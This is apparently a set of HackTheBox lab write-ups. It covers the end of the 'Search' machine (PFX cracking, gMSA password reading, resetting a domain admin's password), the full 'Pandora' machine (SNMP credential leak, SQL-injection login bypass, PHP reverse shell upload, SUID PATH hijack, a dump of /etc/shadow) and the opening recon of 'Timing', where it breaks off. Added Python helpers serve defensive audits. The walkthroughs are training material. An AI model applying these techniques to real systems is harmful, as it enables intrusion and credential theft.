Eliezer | Jordan | !!05_goes_SEVEN_offer_83!! | Eliezer.Jordan |
Hunter | Kirby | ~~27%when%VILLAGE%full%00~~ | Hunter.Kirby |
Sierra | Frye | $$49=wide=STRAIGHT=jordan=28$$18 | Sierra.Frye |
Annabelle | Wells | ==95~pass~QUIET~austria~77== | Annabelle.Wells |
Eve | Galvan | //61!banker!FANCY!measure!25// | Eve.Galvan |
Jeramiah | Fritz | ??40:student:MAYOR:been:66?? | Jeramiah.Fritz |
Abby | Gonzalez | &&75:major:RADIO:state:93&& | Abby.Gonzalez |
Joy | Costa | **30*venus*BALL*office*42** | Joy.Costa |
Vincent | Sutton | **24&moment&BRAZIL&members&66** | Vincent.Sutton |
Now we have 14 more username and password pairs. Looking at the BloodHound path to domain admin, only two of these users are on it: Abby and Sierra. Abby's password didn't work, but Sierra's did.
$\> smbclient //search.htb/RedirectedFolders$ -U Sierra.Frye
Enter WORKGROUP\Sierra.Frye's password: $$49=wide=STRAIGHT=jordan=28$$18
Try "help" to get a list of possible commands.
smb: \> cd sierra.frye\Desktop\
smb: \sierra.frye\Desktop\> ls
  .                                 DRc        0  Thu Nov 18 01:08:00 2021
  ..                                DRc        0  Thu Nov 18 01:08:00 2021
  $RECYCLE.BIN                     DHSc        0  Tue Apr  7 18:03:59 2020
  desktop.ini                      AHSc      282  Fri Jul 31 14:42:15 2020
  Microsoft Edge.lnk                 Ac     1450  Tue Apr  7 12:28:05 2020
  user.txt                           Ac       33  Thu Nov 18 00:55:27 2021

		3246079 blocks of size 4096. 459005 blocks available
smb: \sierra.frye\Desktop\> get user.txt
getting file \sierra.frye\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
We have the user flag now. Under Downloads\Backups there are two more files.
smb: \sierra.frye\Downloads\Backups\> ls
  .                                 DHc        0  Mon Aug 10 20:39:17 2020
  ..                                DHc        0  Mon Aug 10 20:39:17 2020
  search-RESEARCH-CA.p12             Ac     2643  Fri Jul 31 15:04:11 2020
  staff.pfx                          Ac     4326  Mon Aug 10 20:39:17 2020

		3246079 blocks of size 4096. 458996 blocks available
These are certificate files; let's download them to our machine.
A .p12 file is a PKCS#12 (Public Key Cryptography Standard #12) container: a portable, password-protected bundle of a private key together with its certificate and, usually, the issuing chain. It is the standard way to move a personal certificate between machines and applications, and the .pfx extension is the same format under a different name.
We can try to import staff.pfx into the browser (Firefox). It asks for the password, which we can try to crack with the tool below.
GitHub – Ridter/p12tool: A simple Go script to brute force or parse a password-protected PKCS#12 (PFX/P12) file.
$\> ./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
Version: 1.0 (n/a) - 01/03/22 - Evi1cg
2022/01/03 02:34:13 -> [*] Brute forcing...
2022/01/03 02:34:13 -> [*] Start thread num 100
2022/01/03 03:01:44 -> [+] Password found ==> misspissy
2022/01/03 03:01:44 -> [*] Successfully cracked password after 5484391 attempts!
This run took about 27 minutes and 5.4 million attempts; on a VM it takes considerably longer. Now that we have the certificate password (misspissy), import it into the browser. There is a specific endpoint on the web server that is only reachable with this client certificate; the browser will offer the imported certificate when it is requested.
That endpoint prompts for credentials. Entering Sierra's username and password '$$49=wide=STRAIGHT=jordan=28$$18' gives access to a PowerShell console.
After login we can run Powershell commands.
Let's go back to BloodHound and look for a path from the owned principal to domain admin. As Sierra is a member of ITSEC, she can read the gMSA password.
BIR-ADFS-GMSA@SEARCH.HTB is a Group Managed Service Account, and the group ITSEC@SEARCH.HTB is allowed to retrieve its password (the ReadGMSAPassword edge).
$\> python3 gMSADumper.py -d search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f
gMSAs use 240-byte (120 UTF-16 characters), randomly generated passwords that rotate automatically, so cracking this NT hash is hopeless. That does not matter: the hash can be used as-is for pass-the-hash, and from the PowerShell console we can read the cleartext blob and use the account's credential directly.
PayloadsAllTheThings/Active Directory Attack.md at master · swisskyrepo/PayloadsAllTheThings
Passwordless PowerShell
GMSA Attributes in the Active Directory
msDS-GroupMSAMembership ( PrincipalsAllowedToRetrieveManagedPassword ) – stores the
security principals that can access the GMSA password.
msds-ManagedPassword – This attribute contains a BLOB with password information for
group-managed service accounts.
msDS-ManagedPasswordId – This constructed attribute contains the key identifier for the
current managed password data for a group MSA.
msDS-ManagedPasswordInterval – This attribute is used to retrieve the number of days
before a managed password is automatically changed for a group MSA.
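The msds-ManagedPassword attribute is what gMSADumper and the PowerShell steps below read; it is a small binary structure (MSDS-MANAGEDPASSWORD_BLOB) rather than a plain string. The added example below (written for this page, not code from gMSADumper or DSInternals) serialises and parses that structure so the layout is visible: a 16-byte header with a version and four offsets, a NUL-terminated UTF-16LE current password, an optional previous password (kept during rotation so that services mid-change still authenticate), alignment padding, and the two rotation intervals in 100-nanosecond units. The 120-character password is constructed here; a DC derives the real one from the KDS root key, and the DC only returns the attribute over a sealed (encrypted) LDAP connection to principals listed in msDS-GroupMSAMembership.

```python
import struct

HUNDRED_NS_PER_DAY = 10_000_000 * 86_400

# Constructed 120-character password: real gMSA passwords are 120 random UTF-16 code units,
# i.e. 240 bytes, most of them unprintable.
SAMPLE_PASSWORD = "".join(chr(0x100 + 7 * i) for i in range(120))


def build_managed_password_blob(current, previous=None, query_days=30, unchanged_days=30):
    """Serialise a MSDS-MANAGEDPASSWORD_BLOB the way the DC returns msDS-ManagedPassword
    (constructed sample; only the DC builds the real one, from the KDS root key)."""
    body = bytearray(current.encode("utf-16-le") + b"\x00\x00")  # CurrentPassword, NUL-terminated
    cur_off, prev_off = 16, 0                                    # 16-byte fixed header
    if previous is not None:                                     # PreviousPassword is optional
        prev_off = 16 + len(body)
        body += previous.encode("utf-16-le") + b"\x00\x00"
    body += b"\x00" * (-(16 + len(body)) % 8)                    # AlignmentPadding to 8 bytes
    q_off = 16 + len(body)
    body += struct.pack("<Q", query_days * HUNDRED_NS_PER_DAY)   # QueryPasswordInterval
    u_off = 16 + len(body)
    body += struct.pack("<Q", unchanged_days * HUNDRED_NS_PER_DAY)  # UnchangedPasswordInterval
    header = struct.pack("<HHIHHHH", 1, 0, 16 + len(body), cur_off, prev_off, q_off, u_off)
    return header + bytes(body)


def _utf16z(blob, off):
    end = off
    while blob[end:end + 2] != b"\x00\x00":
        end += 2
    return blob[off:end].decode("utf-16-le")


def parse_managed_password_blob(blob):
    """Decode the blob: Version, Reserved, Length, then four offsets into the body."""
    version, _reserved, length, cur_off, prev_off, q_off, u_off = struct.unpack_from("<HHIHHHH", blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 MSDS-MANAGEDPASSWORD_BLOB")
    return {
        "current": _utf16z(blob, cur_off),
        "previous": _utf16z(blob, prev_off) if prev_off else None,
        "query_interval_days": struct.unpack_from("<Q", blob, q_off)[0] // HUNDRED_NS_PER_DAY,
        "unchanged_interval_days": struct.unpack_from("<Q", blob, u_off)[0] // HUNDRED_NS_PER_DAY,
    }


if __name__ == "__main__":
    parsed = parse_managed_password_blob(build_managed_password_blob(SAMPLE_PASSWORD))
    # gMSADumper prints MD4(current.encode("utf-16-le")), the NT hash, rather than this string.
    print(len(parsed["current"]), "chars,", parsed["query_interval_days"], "day rotation")
```

The NT hash that gMSADumper printed above is simply MD4 over the UTF-16LE bytes of the "current" string, which is why the cleartext blob and the hash are interchangeable for authentication. Defensively, the blob is only as safe as msDS-GroupMSAMembership: every principal in that list, and everyone who can edit it, effectively owns the service account.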
Based on these two posts, we can read the managed password from the PowerShell console and run commands as BIR-ADFS-GMSA$, which is the step that leads to domain admin.
$user = 'BIR-ADFS-GMSA$'
$gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
$blob = $gmsa.'msDS-ManagedPassword'
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword
The lines above read the managed password blob from the account object, decode it into a SecureString (ConvertFrom-ADManagedPasswordBlob comes from the DSInternals module; Get-ADServiceAccount from the ActiveDirectory module) and wrap it in a PSCredential, so that we can run commands as the 'BIR-ADFS-GMSA$' user.
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\Sierra.Frye\Documents> $user = 'BIR-ADFS-GMSA$'
PS C:\Users\Sierra.Frye\Documents> $gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> $blob = $gmsa.'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> $mp = ConvertFrom-ADManagedPasswordBlob $blob
PS C:\Users\Sierra.Frye\Documents> $cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword
PS C:\Users\Sierra.Frye\Documents> Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}
search\bir-adfs-gmsa$
PS C:\Users\Sierra.Frye\Documents>
Everything is set. With that credential, Invoke-Command runs any script block as the gMSA; the first thing to run is whoami, to confirm whose context we are in:
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}
As the transcript shows, whoami reports 'search\bir-adfs-gmsa$', not Sierra.
Let's look at BloodHound one more time, this time at the GenericAll edge from the gMSA and its help text.
As the help text says, GenericAll means full control over the 'Tristan.Davies' user, who is a domain admin. The bluntest way to use it is to reset the password. On a real engagement that is noisy and disruptive (BloodHound's help panel for the edge lists quieter options), but here it is fine:
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {net user Tristan.Davies qwerty1234 /domain}
Now we can log in as Tristan.Davies, open the C$ share and read the root flag from the Administrator's desktop.
$\> smbclient //search.htb/C$ -U Tristan.Davies
Enter WORKGROUP\Tristan.Davies's password:
Try "help" to get a list of possible commands.
smb: \> ls
  $RECYCLE.BIN   Config.Msi   Documents and Settings   HelpDesk   inetpub   pagefile.sys   PerfLogs
  Program Files   Program Files (x86)   ProgramData   Recovery   RedirectedFolders
  System Volume Information   Users   Windows

		3246079 blocks of size 4096. 534471 blocks available
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
htb-pandora-private
Highlights
Enumeration with nmap reveals a web service that appears to serve only static pages. A UDP scan reveals SNMP open, and walking it with snmpwalk exposes user credentials on a process command line. Once inside the box, we find a second website that is only reachable from localhost. It hosts an open-source monitoring system with a known vulnerability; exploiting it gives us a shell as a more privileged user. From there, a SUID binary that calls tar by its bare name leads to root.
First we start with the nmap scan.
nmap -sV -sC 10.129.252.195
We see that TCP ports 22 (ssh) and 80 (http) are open. Let's check what port 80 gives us.
Browsing the site, all pages appear to be static and no dynamic content is shown. There is a contact form for sending a message to the admins, but submitting it does nothing except refresh the page. There is no robots.txt that might reveal anything interesting either. Maybe there are some hidden directories, so let's fire up gobuster!
gobuster dir -u http://10.129.252.195 -w /usr/share/wordlist/directory-list-2.3-small.txt
Gobuster gives nothing interesting except, the /assets directory which contains javascript and css files and some images. Maybe this is the directory where it is fetching the contents on the main website from.
Lets try a UDP scan.
┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $sudo nmap -v --min-rate 10000 -sU pandora.htb -oN udp_nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-09 11:56 CEST
Initiating Ping Scan at 11:56
Scanning pandora.htb (10.10.11.136) [4 ports]
Completed Ping Scan at 11:56, 0.12s elapsed (1 total hosts)
Initiating UDP Scan at 11:56
Scanning pandora.htb (10.10.11.136) [1000 ports]
Discovered open port 161/udp on 10.10.11.136
Completed UDP Scan at 11:56, 0.70s elapsed (1000 total ports)
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.10s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp
2049/udp closed nfs
16503/udp closed unknown
19075/udp closed unknown
21655/udp closed unknown
54925/udp closed unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.94 seconds
Raw packets sent: 2028 (93.718KB) | Rcvd: 9 (772B)
┌─[puck@parrot-lt]─[~/htb/pandora]
We have one open UDP port, 161 (SNMP). Let's see what it has to offer by running snmpwalk with the public community string.
public is the default read-only community on most SNMP servers, which is why I tried it first; if it doesn't work, the community string has to be brute-forced (onesixtyone and similar tools do this).
┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $snmpwalk -v 2c pandora.htb -c public
Snmpwalk gave us a bunch of details, but the most interesting one is the credentials of the user Daniel. Apparently there is a process running and the command of that includes the credentials for the user Daniel.
iso.3.6.1.2.1.25.4.2.1.5.836 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrig
ger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.837 = ""
iso.3.6.1.2.1.25.4.2.1.5.893 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.946 = ""
iso.3.6.1.2.1.25.4.2.1.5.948 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.951 = STRING: "--no-debug"
iso.3.6.1.2.1.25.4.2.1.5.1101 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.3620 = ""
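Spotting one row by eye works for a walk this short; on a real host hrSWRunTable has hundreds of entries and snmpwalk folds long values over several lines, as it did for snmpd above. The added example below (written for this page, not from the original post) parses the hrSWRunName and hrSWRunParameters columns into per-process records, glues wrapped lines back together, and flags arguments that carry a password-style switch while skipping the look-alikes in this very walk: snmpd's -p is a pidfile path and agetty's -p is followed by another option. The sample walk is constructed from the parameter rows shown above plus hrSWRunName rows the page does not show (host_check is an assumed name).

```python
import re

# hrSWRunTable (HOST-RESOURCES-MIB): column 2 = hrSWRunName, 4 = hrSWRunPath, 5 = hrSWRunParameters
HR_SW_RUN = re.compile(r'^iso\.3\.6\.1\.2\.1\.25\.4\.2\.1\.(\d+)\.(\d+) = (?:STRING: "(.*)"|"")$')
COLUMNS = {2: "name", 4: "path", 5: "params"}

# Command-line switches that usually carry a secret; the captured value is checked afterwards.
SECRET_SWITCH = re.compile(r"(?:^|\s)(?:-p|-P|--password|--pass)(?:=|\s+)(\S+)")

# Constructed sample: the parameter rows from the walk above (including snmpwalk's wrapped
# line), plus hrSWRunName rows that the page does not show.
SAMPLE_WALK = r'''
iso.3.6.1.2.1.25.4.2.1.2.836 = STRING: "snmpd"
iso.3.6.1.2.1.25.4.2.1.2.893 = STRING: "agetty"
iso.3.6.1.2.1.25.4.2.1.2.1101 = STRING: "host_check"
iso.3.6.1.2.1.25.4.2.1.5.836 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrig
ger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.837 = ""
iso.3.6.1.2.1.25.4.2.1.5.893 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.948 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1101 = STRING: "-u daniel -p HotelBabylon23"
'''.strip()


def join_wrapped(lines):
    """snmpwalk folds long STRING values; a line that does not start with the OID prefix
    is the continuation of the previous one (the fold can land mid-word, as above)."""
    out = []
    for line in lines:
        if line.startswith("iso.") or not out:
            out.append(line)
        else:
            out[-1] += line
    return out


def parse_hr_sw_run(text):
    """Group the walk into {pid: {"name": ..., "path": ..., "params": ...}}."""
    procs = {}
    for line in join_wrapped(text.splitlines()):
        m = HR_SW_RUN.match(line)
        if not m:
            continue
        column, pid, value = int(m.group(1)), int(m.group(2)), m.group(3) or ""
        if column in COLUMNS:
            procs.setdefault(pid, {})[COLUMNS[column]] = value
    return procs


def find_command_line_secrets(text):
    """Return (pid, name, value) for every process whose arguments carry a password-like switch.
    Values that are paths (snmpd's -p pidfile) or further options (agetty's -p --) are skipped."""
    hits = []
    for pid, proc in sorted(parse_hr_sw_run(text).items()):
        for m in SECRET_SWITCH.finditer(proc.get("params", "")):
            value = m.group(1)
            if not value.startswith(("/", "-")):
                hits.append((pid, proc.get("name", ""), value))
    return hits


if __name__ == "__main__":
    for pid, name, secret in find_command_line_secrets(SAMPLE_WALK):
        print("pid %d (%s): %s" % (pid, name, secret))
```

Run against a saved walk (snmpwalk -v 2c -c public pandora.htb > walk.txt) the same function gives a short list to triage instead of a few thousand lines to scroll. The underlying problem is worth naming for the report: any secret passed as a process argument is readable by every local user through /proc, and here also by anyone on the network who knows the community string, because hrSWRunParameters republishes the command line.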
Let's ssh into the box with the obtained credentials. The user "daniel" does not have many privileges. Looking at /etc/passwd, there is one other user, matt, who might. Looking around the system, we see that alongside the static website from earlier there is another web app called pandora. The sites-enabled config gives no route to it from the outside, but a curl request from localhost on the victim shows something interesting.
It seems that only localhost can reach that site. Let's create an SSH tunnel to port 80 so that we can browse it from our machine. sudo is only needed because the local end binds port 80; any high port (for example -L 8080:localhost:80) works without it.
┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $sudo ssh -L 80:localhost:80 daniel@pandora.htb
daniel@10.10.11.136's password: HotelBabylon23
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 24 Jan 15:07:49 UTC 2022

  System load:  0.37               Processes:             259
  Usage of /:   63.6% of 4.87GB    Users logged in:       1
  Memory usage: 18%                IPv4 address for eth0: 10.10.11.136
  Swap usage:   0%

  => /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Jan 24 15:06:04 2022 from 10.10.14.28
daniel@pandora:~$
The pandora console opens and asks for credentials.
Common login credentials like admin/admin, admin/password don’t work. Googling pandora gives us the information that it is a monitoring system. Moreover the version of the pandora is clearly visible on the bottom of the login page: v7.0NG.742. On searching for the exploit specific to this version we come across a very interesting article.
https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained
This article gives a detailed explanation of the underlying vulnerability. Using this SQL injection we can bypass the login page and get admin access:
https://github.com/zjicmDarkWing/CVE-2021-32099
Then visit http://127.0.0.1/pandora_console/ and you are logged in as admin.
After logging in as admin, we snoop around a bit and see that there is a file upload option. The system also appears to be written in PHP, so let’s use the good old php-reverse-shell.
We upload the shell, start a listener on port 9000 on our machine and navigate to the shell in our browser:
http://127.0.0.1/pandora_console/images/shell.php
Voila! We get a reverse shell as the user matt and we get user.txt. Great!!!
We generate SSH keys so that we can log in with SSH and not have to deal with the crappy shell.
After logging in, the first thing we do is get linpeas.sh onto the target system. Running linpeas gives some juicy info, but the most eye-catching thing is a binary called pandora_backup with the SUID bit set.
Looking at the contents of the binary, we see that it is using tar to uncompress something from /root. Since tar is not called with an absolute path, we can use PATH hijacking to obtain root.
matt@pandora:/$ file /usr/bin/pandora_backup
file /usr/bin/pandora_backup
/usr/bin/pandora_backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
matt@pandora:/$ /usr/bin/pandora_backup
/usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!
matt@pandora:/$
We create a local file named tar with the contents “/bin/sh”, prepend its directory to our PATH environment variable and run the binary; we get root and our last flag inside /root.
┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $ssh matt@pandora.htb -i id_rsa
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 25 Jan 11:48:33 UTC 2022
System load: 0.27 Processes: 288
Usage of /: 63.4% of 4.87GB Users logged in: 1
Memory usage: 11% IPv4 address for eth0: 10.10.11.136
Swap usage: 0%
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
matt@pandora:~$ ls
user.txt
matt@pandora:~$ export PATH=/home/matt:$PATH
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
/home/matt/tar: 1: bin/bash: not found
Backup failed!
Check your permissions!
matt@pandora:~$ echo $PATH
/home/matt:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:~$ cat tar
bin/bash
matt@pandora:~$ echo "/bin/bash" > tar
matt@pandora:~$ cat tar
/bin/bash
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:~# cd /root
root@pandora:/root# ls
root.txt
root@pandora:/root# cat root.txt
e50cb013f81c9bb1880dd795ffbaead8
root@pandora:/root# cat /etc/shadow\
> /
cat: /etc/shadow/: Not a directory
root@pandora:/root# cat /etc/shadow
root:$6$HM2preufywiCDqbY$XPrZFWf6w08MKkjghhCPBkxUo2Ag5xvZYOh4iD4XcN4zOVbWsdvqLYbznbUlLFxtC/.Z0oe9D6dT0cR7suhfr.:18794:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
--snip--
sshd:*:18789:0:99999:7:::
systemd-coredump:!!:18789::::::
matt:$6$JYpB9KogYA60PG6X$dU7jHpb3MIYYg0evztbE8Xw8dx7ok5/U0PaDT63FgQTwyJFr9DbaLa0WzeZGMFd05hrNCnoP5xTUr7Mkl2gNx1:18794:0:99999:7:::
lxd:!:18789::::::
Debian-snmp:!:18789:0:99999:7:::
mysql:!:18789:0:99999:7:::
daniel:$6$f4POti4xJyVf3/yD$7/efpNYDq.baYycVczUb4b5LlEBNami3//4TbI6lPNK2MaWPrqbdvAhLdMrfHnnZATY59rLgr4DeEZ3U8S41l/:18964:0:99999:7:::
root@pandora:/root#
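The PATH hijack above works because a privileged binary shells out to tar by bare name. As an added defensive check, not part of the writeup, the following Python script audits setuid/setgid binaries for strings that look like a command line starting with a bare command name; the list of known commands and the sample strings output are assumptions constructed for the example, not the real pandora_backup contents.

```python
#!/usr/bin/env python3
"""Audit setuid/setgid binaries for commands invoked by bare name.

Added example, not from the writeup. A privileged program that runs
"tar ..." instead of "/usr/bin/tar ..." lets the kernel resolve the command
through the caller's PATH, which is what the PATH hijack of pandora_backup
abused. This script extracts printable strings from every setuid/setgid file
under the given roots and flags strings whose first word is a well-known
command written without a slash.
"""
import os
import re
import stat
from typing import Dict, Iterable, List

# Commands a privileged helper typically shells out to (assumption; extend as needed).
KNOWN_COMMANDS = {
    "tar", "gzip", "cp", "mv", "rm", "sh", "bash", "find",
    "chmod", "chown", "mysqldump", "rsync", "curl", "wget",
}

# A command line: first token contains no '/', followed by at least one argument.
_CMDLINE_RE = re.compile(r"^(?P<cmd>[A-Za-z][\w.+-]*)\s+\S.*$")
# Runs of printable ASCII, like the `strings` tool with its default minimum length.
_PRINTABLE_RE = re.compile(rb"[\x20-\x7e]{4,}")


def extract_strings(data: bytes) -> List[str]:
    """Return printable-ASCII runs of length >= 4 found in data (minimal `strings`)."""
    return [m.group().decode("ascii") for m in _PRINTABLE_RE.finditer(data)]


def relative_commands(strings_output: Iterable[str]) -> List[str]:
    """Return strings that look like a command line starting with a bare command name."""
    hits = []
    for line in strings_output:
        line = line.strip()
        m = _CMDLINE_RE.match(line)
        if m and m.group("cmd") in KNOWN_COMMANDS:
            hits.append(line)
    return hits


def is_setuid_or_setgid(path: str) -> bool:
    """True for a regular file with the setuid or setgid bit set (symlinks are not followed)."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))


def audit(roots: Iterable[str] = ("/usr/bin", "/usr/sbin", "/usr/local/bin")) -> Dict[str, List[str]]:
    """Map each flagged setuid/setgid binary to the suspicious command strings inside it."""
    findings: Dict[str, List[str]] = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                if not is_setuid_or_setgid(path):
                    continue
                try:
                    with open(path, "rb") as fh:
                        hits = relative_commands(extract_strings(fh.read()))
                except OSError:
                    continue
                if hits:
                    findings[path] = hits
    return findings


# Constructed sample resembling `strings` output of a backup helper (not the real binary).
SAMPLE_STRINGS = [
    "PandoraFMS Backup Utility",
    "Now attempting to backup PandoraFMS client",
    "tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora",
    "/usr/bin/tar -tzf /root/.backup/pandora-backup.tar.gz",
    "Backup failed!",
    "Check your permissions!",
]

if __name__ == "__main__":
    for hit in relative_commands(SAMPLE_STRINGS):
        print("sample hit:", hit)
    for path, hits in audit().items():
        print(path)
        for hit in hits:
            print("   ", hit)
```

A hit means the binary should either call the command by absolute path or set a fixed PATH before exec; the string scan is a heuristic, so confirm with disassembly before filing it.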
htb-timing-nl
Hackthebox Timing writeup
Introduction@Timing:~$
Column | Details |
---|---|
Name | Timing |
IP | 10.10.11.135 |
Points | 30 |
OS | Linux |
Difficulty | Medium |
Creator | irogir |
Out On | 11 Dec 2021 |
Brief@Timing:~$
Hackthebox released a new machine called Timing. In this machine we first need to find an LFI with some fuzzing. Through the LFI we dump the source code of the files and gather useful information to reach the admin panel. Through the admin panel we upload images, abusing that function to get RFI, then dump the git directory to find an old password and get an SSH session. After that we abuse netutils to overwrite authorized_keys.
Recon
Nmap
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ nmap -sC -sV -oA nmap/result 10.10.11.135
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-21 23:05 CST
Nmap scan report for 10.10.11.135
Host is up (0.091s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:5c:40:d7:c9:fe:ff:a8:83:c3:6e:cd:60:11:d2:eb (RSA)
| 256 18:c9:f7:b9:27:36:a1:16:59:23:35:84:34:31:b3:ad (ECDSA)
|_ 256 a2:2d:ee:db:4e:bf:f9:3f:8b:d4:cf:b4:12:d8:20:f2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Simple WebApp
|_Requested resource was ./login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.38 seconds
There are two open ports: 22 (ssh) and 80 (http).
Port-80
It’s a simple login page. Trying default usernames and passwords, nothing works. Let’s run gobuster.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ gobuster dir -u http://10.10.11.135/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.135/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/12/21 23:22:09 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 313] [--> http://10.10.11.135/images/]
/login.php (Status: 200) [Size: 5609]
/index.php (Status: 302) [Size: 0] [--> ./login.php]
/profile.php (Status: 302) [Size: 0] [--> ./login.php]
/image.php (Status: 200) [Size: 0]
/header.php (Status: 302) [Size: 0] [--> ./login.php]
/footer.php (Status: 200) [Size: 3937]
/upload.php (Status: 302) [Size: 0] [--> ./login.php]
/css (Status: 301) [Size: 310] [--> http://10.10.11.135/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.11.135/js/]
/logout.php (Status: 302) [Size: 0] [--> ./login.php]
All pages redirect to login.php except /images and image.php.
Let’s first go to /images: Forbidden! Let’s check image.php.
image.php doesn’t give any error or redirect. I think this page accepts some GET or POST parameter, because when we upload a PHP shell through images it also needs a parameter, and if we don’t pass one it gives us a blank page like this.
Let’s find the parameter with wfuzz.
┌───[us-free-1]─[10.10.14.116]─[root@parrot]─[~/Desktop/HTB/Timing]
└──╼ [★]$ wfuzz -u http://10.10.11.135/image.php?FUZZ=/etc/passwd -w /usr/share/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt -t 50 --hh 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
